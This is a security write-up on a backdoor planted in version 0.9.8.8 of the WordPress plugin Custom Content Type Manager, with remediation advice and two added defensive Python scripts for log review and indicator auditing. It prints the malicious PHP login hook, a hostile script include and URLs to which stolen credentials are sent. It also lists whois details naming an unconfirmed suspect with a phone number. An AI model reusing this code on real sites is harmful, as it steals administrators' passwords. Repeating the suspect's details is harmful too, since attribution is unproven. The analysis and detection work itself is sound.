Researchers recently pointed out that the WordPress plugin Custom Content Type Manager (CCTM) contains a backdoor that can steal administrator accounts and passwords.
According to researchers on the Sucuri security team, the WordPress plugin Custom Content Type Manager (CCTM) carries a backdoor. Through it, an attacker can tamper with WordPress core files to record and steal the login accounts and passwords of administrators on infected sites.
Freebuf Encyclopedia
Functions of the Custom Content Type Manager plugin
Custom Content Type Manager (CCTM) lets users create custom content types (also called post types) and attach standardized custom fields to them, such as drop-down menus, check boxes, images and other elements, extending WordPress content management. The plugin can also export and import these content type definitions, which makes it easy to keep the same structure across multiple sites.
Suppose you want to add a separate section of your blog for movie reviews. With a custom post type you can create a new post type, alongside the built-in posts and pages, that holds a different set of data, with its own admin menu, a dedicated editing screen, custom taxonomies and more useful publishing options. Custom post types get the same management options as the default types (posts, pages and attachments). A custom post type can store many kinds of information; it has a dedicated editor and media upload, and it uses the existing WordPress table structure, which keeps data management simple.
Backdoor discovery
This incident was first tracked and analyzed by the Sucuri security team, a company that provides web security services. According to Sucuri's researchers,
they first found a file with an odd name (auto-update.php) on a client's site, and at first saw no suspicious behavior from it, until the plugin was updated.
Sucuri noted that they came across the suspicious file auto-update.php while cleaning an infected customer site; the file sits in wp-content/plugins/custom-content-type-manager/.
Analysis showed that the backdoor can download files from http://wordpresscore.com/plugins/cctm/update/server and save them as .php files in the plugin's directory.
The plugin in question is the Custom Content Type Manager (CCTM) described above. Over the past three years it has been used mainly to create custom post types and has built up a user base; according to preliminary figures it is installed on more than 10,000 sites.
A cloud of suspicion over the plugin: a mysterious new maintainer
A two-week investigation by the Sucuri team found that the plugin had not been updated for roughly the past 10 months, nearly a year, yet its maintainers had recently changed under mysterious circumstances. A new developer named wooranker then updated the plugin and released a new version.
Every plugin in the official WordPress plugin directory is published through a Subversion repository. With the help of the Trac issue tracker, anyone can browse the history of any version of any plugin (who changed what, and when). For example, here are the recent changes to CCTM:
From the history above we can see that one of the changes was the addition of the auto-update.php file on February 18, 2016. In this update "wooranker" made changes and added the following commit message:
"Minor changes to new managers" (original wording preserved)
In fact, the history also shows that the plugin was still being updated by fireproofsocks two weeks earlier, but one of the subsequent changes is described as "adding wooranker to readme", after which it is wooranker who updates the plugin.
Perhaps the original developer lost interest in the plugin, or was hired by wooranker. On the other hand, since fireproofsocks had not updated the plugin for nearly a year, we also wonder whether wooranker compromised the fireproofsocks account and then added itself as a new maintainer.
In addition, on February 5, 2016, wooranker was also added to the Postie plugin project. All changes to the Postie project look legitimate, can be reviewed, and were approved by Postie's original author. This is somewhat confusing. Next, let's look at how the updated malicious CCTM plugin works and how wooranker used it to break into sites.
Malicious code in Custom Content Type Manager (CCTM) 0.9.8.8
The developer gave the updated version a new "mission". First, as shown above, the new version adds an auto-update.php file which, according to the analysis, can download files from a remote server onto an infected site.
We can also see in Trac (last updated February 19) that it adds the file includes/CCTM_Communicator.php (this file runs together with auto-update.php; its main job is to ping the wooranker server so that the server can record information such as the IP address of the newly infected site), and inserts the following code into the plugin's index.php file:
// Send plugin information when user login
function _wp_login_eventhandler($user_login, $user) {
    require_once('includes/CCTM_Communicator.php');
    $_objCCTMCom = new CCTM_Communicator();
    $_objCCTMCom->addInfo(array($user_login, $user));
    $_objCCTMCom->send_info();
}
add_action('wp_login', '_wp_login_eventhandler', 10, 2);
The specific changes are:
This code sends site and user information to the wooranker server (wordpresscore.com) whenever a user logs in to the WordPress site.
Replaying the attack path
The attack can be traced back through the visits to, and login attempts against, infected sites.
On February 28, a login attempt against WordPress was made from source address 104.131.27.120 using a Python script (User-Agent "python-requests/2.2.1 CPython/2.7.6 Linux/3.20.-79-generic"). The site address was obviously obtained through the new CCTM_Communicator function.
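The scripted login attempt described above is exactly the kind of event a site's web server access log records. The following Python script is an added example, not part of the original article or of Sucuri's tooling: it parses combined-format access log lines (the sample lines are constructed; the source address and User-Agent string are the ones reported above), flags requests to the login endpoint that come from a scripted HTTP client or from a watch-listed address, and tallies them per source. The login_paths parameter lets a site that has moved its login URL, as the administrator in this story did, point the check at the new path.

```python
import re
from collections import Counter

# Constructed combined-format access log lines. The second and third mimic the
# scripted login attempt in the write-up (source IP and User-Agent as reported
# there); the others are ordinary browser traffic. Not real captured traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Feb/2016:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0"
104.131.27.120 - - [28/Feb/2016:10:02:15 +0000] "GET /wp-login.php HTTP/1.1" 200 3300 "-" "python-requests/2.2.1 CPython/2.7.6 Linux/3.20.-79-generic"
104.131.27.120 - - [28/Feb/2016:10:02:16 +0000] "POST /wp-login.php HTTP/1.1" 200 3300 "-" "python-requests/2.2.1 CPython/2.7.6 Linux/3.20.-79-generic"
198.51.100.7 - - [28/Feb/2016:10:05:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.test/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/48.0 Safari/537.36"
"""

# Apache/nginx "combined" format: ip ident user [time] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent prefixes of common HTTP libraries and CLI tools. A request to the
# login form from one of these is not a person typing into a browser.
SCRIPTED_UA_PREFIXES = (
    "python-requests/", "python-urllib", "curl/", "wget/",
    "go-http-client/", "libwww-perl",
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_scripted_client(ua):
    """True for an empty User-Agent or one from a known scripted client."""
    return ua == "-" or ua.lower().startswith(SCRIPTED_UA_PREFIXES)


def find_login_probes(log_text, login_paths=("/wp-login.php",), watchlist=frozenset()):
    """Return requests to a login endpoint that come from a scripted client or
    from a watch-listed source address, whether or not they succeeded."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore query string
        if path not in login_paths:
            continue
        reasons = []
        if is_scripted_client(rec["ua"]):
            reasons.append("scripted user-agent")
        if rec["ip"] in watchlist:
            reasons.append("watch-listed source")
        if reasons:
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                "status": rec["status"], "ua": rec["ua"], "reasons": reasons,
            })
    return findings


def per_source(findings):
    """Count flagged login requests per source address."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = find_login_probes(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["method"], h["status"], ", ".join(h["reasons"]))
    print(per_source(hits))
```

A 200 response to a POST on wp-login.php is itself informative: WordPress redirects (302) on a successful login and re-renders the form (200) on a failed one, so the two flagged lines show a scripted client trying and failing, which matches the failed attempt the article goes on to describe.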
Monitoring of the infected site showed wooranker attempting to log in. However, because the site administrator had changed the login URL, the login failed. Blocked, wooranker changed tactics: using the auto-update.php backdoor, it forced the target site to download and install another file named c.php, whose main purpose is to create yet another file named wp-options.php. The latter tampers with WordPress core files. According to the analysis, three files were modified:
1. wp-login.php: sends the administrator's login credentials to hxxp://wordpresscore.com/in/login/index.php;
2. wp-admin/user-new.php: steals the login credentials of newly created users and sends them to hxxp://wordpresscore.com/in/add-user/index.php;
3. wp-admin/user-edit.php: steals the new credentials when a user changes their password and sends them to hxxp://wordpresscore.com/in/pass-change/index.php.
Some users have auto-updated to the plugin version carrying the malicious code
These functions were merged into CCTM (Custom Content Type Manager) version 0.9.8.8, and many users have installed that version or had it automatically updated on their sites.
The hacker tampers with WordPress core files so as to hook user login, user creation and user editing, intercepting user data before it is encrypted (hashed) by WordPress and sending the plaintext password to the server. In addition, wp-options.php can even create administrator accounts on infected sites, typically with the username support and the mailbox support@wordpresscore.com.
In short, wooranker can hold an administrator account on every infected site, and whenever a user logs in, wooranker is notified of the password used.
Who is the hacker, really?
While analyzing and trying to confirm the hacker's identity, we also found another change in the plugin updates. After wooranker gained maintainer rights over the plugin, it first added a reference to donutjs (described on its official website as a lightweight JS framework) in the includes/CCTM.php file:
wp_enqueue_script('donutjs', '//donutjs.com/jquery.js');
Most people have probably never heard of donutjs; even a search engine query turns up no relevant results. From its "official website" I learned that donutjs is a lightweight framework meant to support JavaScript application development, targeted mainly at jQuery. Below are the official website address (donutjs) and its promotional material.
Comparison with jQuery syntax, for example:
1. Fade out elements and remove them
2. Call Ajax
On analysis, we found that the donutjs.com/jquery.js mentioned above returns the following:
This code also collects and records site addresses.
We then found that wooranker also controls donutjs.com. Running whois returns the following:
Wordpresscore.com
Created on:
Registrant Name: Vishnudath Mangilipudi
Admin State/Province: Andhra Pradesh
Admin Postal Code: 524201
Admin Country: IN
Admin Phone: +91.8985005295
Name Servers:
NS1.DIGITALOCEAN.COM
NS2.DIGITALOCEAN.COM
NS3.DIGITALOCEAN.COM
Donutjs.com
Registrant Name: vishnudath
Admin Country: IN
Admin Phone: +91.8985005295
From this we can see that donutjs is most likely a fake JS framework forged by wooranker to help collect site information.
From the whois information, the actual owner of the wordpresscore.com domain used in the malicious code is a developer named Mangilipudi from India. However, the Sucuri team cannot confirm that Mangilipudi is the hacker behind the scenes, because personal identity information on the Internet is easily stolen and forged. As mentioned earlier, wooranker is also a developer and maintainer of another WordPress plugin, Postie. Sucuri points out, however, that Postie is still managed by its original author and no malicious code has been found in it. The hacker's real identity is therefore still under analysis.
Recommendations
1. Disable the CCTM plugin;
2. Check all WordPress core files. Short of reinstalling WordPress, you should at least check whether the following three files have been tampered with. Pristine copies can be obtained from wordpress.org;
(1) ./wp-login.php
(2) ./wp-admin/user-edit.php
(3) ./wp-admin/user-new.php
3. Change the passwords of all WordPress users;
4. Delete unrecognized WordPress user accounts, especially any whose mailbox is support@wordpresscore.com;
5. If you really need to keep the CCTM plugin on your site, use the stable version 0.9.8.6 (a security vulnerability has been found in version 0.9.8.7).
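To turn recommendations 2 and 4 and the indicators listed under the attack path into something checkable, here is an added Python audit script; it is not from the article, from Sucuri or from the plugin. It hashes the three core files against a pristine WordPress copy, looks for the files the malicious release drops into the plugin directory and for any wp-options.php, and searches PHP and JS files for the two attacker domains named in the article. The directory and file names are taken from the article; the fixture built by build_demo_site() is constructed to exercise the checks and stands in for a real site and a real wordpress.org download.

```python
import hashlib
import tempfile
from pathlib import Path

# The three core files the write-up says wp-options.php rewrites.
CORE_FILES = ("wp-login.php", "wp-admin/user-edit.php", "wp-admin/user-new.php")
# Plugin directory named in the write-up, plus the files it says are added or fetched.
CCTM_DIR = "wp-content/plugins/custom-content-type-manager"
DROPPED_FILES = ("auto-update.php", "includes/CCTM_Communicator.php", "c.php")
# Domains the write-up ties to the backdoor's download and collection servers.
INDICATOR_DOMAINS = ("wordpresscore.com", "donutjs.com")


def sha256_of(path):
    """Hex SHA-256 of a file, or None if it does not exist."""
    p = Path(path)
    return hashlib.sha256(p.read_bytes()).hexdigest() if p.is_file() else None


def audit_site(site_root, reference_root):
    """Compare a live WordPress tree with a pristine copy and hunt for the IoCs."""
    site, ref = Path(site_root), Path(reference_root)
    report = {"tampered_core_files": [], "dropped_files": [], "indicator_hits": []}

    # 1. Core-file integrity: live file hash versus the clean download.
    for rel in CORE_FILES:
        if sha256_of(site / rel) != sha256_of(ref / rel):
            report["tampered_core_files"].append(rel)

    # 2. Files the malicious 0.9.8.8 release adds to, or downloads into, the plugin.
    plugin = site / CCTM_DIR
    for rel in DROPPED_FILES:
        if (plugin / rel).is_file():
            report["dropped_files"].append(f"{CCTM_DIR}/{rel}")
    # wp-options.php is not a WordPress core file name, so flag it anywhere.
    for found in site.rglob("wp-options.php"):
        report["dropped_files"].append(str(found.relative_to(site)))

    # 3. Attacker domains hard-coded in any PHP or JS file under the site root.
    for found in site.rglob("*"):
        if found.suffix not in (".php", ".js") or not found.is_file():
            continue
        text = found.read_text(errors="replace")
        for dom in INDICATOR_DOMAINS:
            if dom in text:
                report["indicator_hits"].append((str(found.relative_to(site)), dom))
    return report


def build_demo_site(base):
    """Constructed fixture: a clean reference tree and an infected copy of it."""
    base = Path(base)
    ref, site = base / "reference", base / "site"
    clean = {
        "wp-login.php": "<?php\n// clean login form (constructed stand-in)\n",
        "wp-admin/user-edit.php": "<?php\n// clean user-edit (constructed stand-in)\n",
        "wp-admin/user-new.php": "<?php\n// clean user-new (constructed stand-in)\n",
    }
    for root in (ref, site):
        for rel, body in clean.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    # Mimic the tampering the write-up describes: wp-login.php now talks to the
    # attacker's server; the other two core files are left untouched.
    (site / "wp-login.php").write_text(
        clean["wp-login.php"]
        + "// constructed stand-in for the injected exfiltration, not the real code\n"
        + "@file_get_contents('hxxp://wordpresscore.com/in/login/index.php');\n"
    )
    plugin = site / CCTM_DIR
    (plugin / "includes").mkdir(parents=True, exist_ok=True)
    (plugin / "auto-update.php").write_text("<?php // constructed stand-in\n")
    (plugin / "includes/CCTM.php").write_text(
        "<?php\nwp_enqueue_script('donutjs', '//donutjs.com/jquery.js');\n"
    )
    return ref, site


def run_demo():
    """Build the fixture in a temporary directory, audit it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        ref, site = build_demo_site(tmp)
        return audit_site(site, ref)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

On a real site, point audit_site() at the web root and at an unpacked download of the same WordPress version from wordpress.org; a hash mismatch on any of the three files means the file should be replaced from the clean copy, and any dropped file or domain hit means the whole plugin directory, not just the flagged file, should be removed.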